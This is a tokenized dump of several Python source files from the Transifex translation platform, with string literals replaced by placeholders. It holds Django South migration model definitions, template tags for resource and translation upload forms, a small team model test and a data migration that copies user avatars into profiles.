[ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> 
'<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:code>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : 
'<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , 
<EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ 
] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:string>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:content>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , 
'<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:5>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:string>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:size>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> from django import template <EOL> from django . db import transaction <EOL> from django . core . urlresolvers import reverse <EOL> from django . http import HttpResponseRedirect <EOL> from django . template . defaultfilters import slugify <EOL> from django . forms . util import ErrorList <EOL> from transifex . txcommon . utils import get_url_pattern <EOL> from transifex . languages . models import Language <EOL> from transifex . resources . forms import CreateResourceForm , ResourceTranslationForm , UpdateTranslationForm <EOL> from transifex . resources . models import Resource <EOL> from transifex . resources . backends import ResourceBackend , FormatsBackend , ResourceBackendError , FormatsBackendError , content_from_uploaded_file , filename_of_uploaded_file <EOL> register = template . Library ( ) <EOL> @ transaction . commit_manually <EOL> @ register . inclusion_tag ( "<STR_LIT>" ) <EOL> def upload_create_resource_form ( request , project , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> resource = None <EOL> display_form = False <EOL> if request . method == '<STR_LIT:POST>' and request . POST . get ( '<STR_LIT>' , None ) : <EOL> cr_form = CreateResourceForm ( <EOL> request . POST , request . FILES , prefix = prefix <EOL> ) <EOL> if cr_form . is_valid ( ) : <EOL> name = cr_form . cleaned_data [ '<STR_LIT:name>' ] <EOL> slug = slugify ( name ) <EOL> try : <EOL> Resource . objects . get ( slug = slug , project = project ) <EOL> except Resource . DoesNotExist : <EOL> pass <EOL> else : <EOL> slug = slugify ( name ) <EOL> identifier = Resource . objects . filter ( <EOL> project = project , slug__icontains = "<STR_LIT>" % slug <EOL> ) . count ( ) + <NUM_LIT:1> <EOL> slug = "<STR_LIT>" % ( slug , identifier ) <EOL> method = cr_form . cleaned_data [ '<STR_LIT>' ] <EOL> content = content_from_uploaded_file ( request . FILES ) <EOL> filename = filename_of_uploaded_file ( request . FILES ) <EOL> rb = ResourceBackend ( ) <EOL> try : <EOL> rb . 
create ( <EOL> project , slug , name , method , project . source_language , <EOL> content , user = request . user , <EOL> extra_data = { '<STR_LIT:filename>' : filename } <EOL> ) <EOL> except ResourceBackendError , e : <EOL> transaction . rollback ( ) <EOL> cr_form . _errors [ '<STR_LIT>' ] = ErrorList ( [ e . message , ] ) <EOL> display_form = True <EOL> else : <EOL> transaction . commit ( ) <EOL> display_form = False <EOL> resource = Resource . objects . get ( slug = slug , project = project ) <EOL> else : <EOL> display_form = True <EOL> else : <EOL> cr_form = CreateResourceForm ( prefix = prefix ) <EOL> display_form = False <EOL> return { <EOL> '<STR_LIT>' : project , <EOL> '<STR_LIT>' : resource , <EOL> '<STR_LIT>' : cr_form , <EOL> '<STR_LIT>' : display_form , <EOL> } <EOL> @ register . inclusion_tag ( "<STR_LIT>" , takes_context = True ) <EOL> def upload_resource_translation_button ( context , request , resource , language = None , <EOL> prefix = '<STR_LIT>' , translate_online = False ) : <EOL> """<STR_LIT>""" <EOL> if language or ( request . POST and <EOL> request . POST . get ( '<STR_LIT>' , None ) ) : <EOL> return update_translation_form ( context , request , resource , language ) <EOL> else : <EOL> return create_translation_form ( context , request , resource , language ) <EOL> def create_translation_form ( context , request , resource , language = None , <EOL> prefix = '<STR_LIT>' , translate_online = True ) : <EOL> form = ResourceTranslationForm ( prefix = prefix ) <EOL> return { <EOL> '<STR_LIT>' : resource . project , <EOL> '<STR_LIT>' : resource , <EOL> '<STR_LIT>' : language , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : translate_online , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : context [ '<STR_LIT>' ] , <EOL> } <EOL> def update_translation_form ( context , request , resource , language = None , <EOL> prefix = '<STR_LIT>' , translate_online = False ) : <EOL> """<STR_LIT>""" <EOL> if language : <EOL> initial = { "<STR_LIT>" : language . 
code , } <EOL> else : <EOL> initial = { } <EOL> form = UpdateTranslationForm ( prefix = prefix , initial = initial ) <EOL> return { <EOL> '<STR_LIT>' : resource . project , <EOL> '<STR_LIT>' : resource , <EOL> '<STR_LIT>' : language , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : context [ '<STR_LIT>' ] , <EOL> } </s>
<s> from status import * <EOL> from views import * <EOL> from permissions import * </s>
<s> from transifex . projects . models import Project <EOL> from transifex . teams . models import Team <EOL> from transifex . txcommon . tests import base <EOL> class TestTeamModels ( base . BaseTestCase ) : <EOL> def test_available_teams ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEquals ( self . project . available_teams . count ( ) , <NUM_LIT:1> ) <EOL> team = Team . objects . get_or_create ( language = self . language_ar , <EOL> project = self . project , creator = self . user [ '<STR_LIT>' ] ) [ <NUM_LIT:0> ] <EOL> project = Project . objects . get_or_create ( slug = "<STR_LIT:foo>" , <EOL> defaults = { '<STR_LIT:name>' : "<STR_LIT>" } , <EOL> source_language = self . language_en ) [ <NUM_LIT:0> ] <EOL> project . outsource = self . project <EOL> self . assertEquals ( project . available_teams . count ( ) , <NUM_LIT:2> ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> from django . db . utils import DatabaseError <EOL> class Migration ( DataMigration ) : <EOL> depends_on = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ) <EOL> def forwards ( self , orm ) : <EOL> try : <EOL> for a in orm [ '<STR_LIT>' ] . objects . filter ( valid = True ) : <EOL> try : <EOL> a . user . profile . mugshot = a . image <EOL> a . user . profile . save ( ) <EOL> except Exception , e : <EOL> print "<STR_LIT>" % ( a . user , <EOL> e . message ) <EOL> except DatabaseError : <EOL> pass <EOL> def backwards ( self , orm ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : 
'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT:code>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:description>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { 
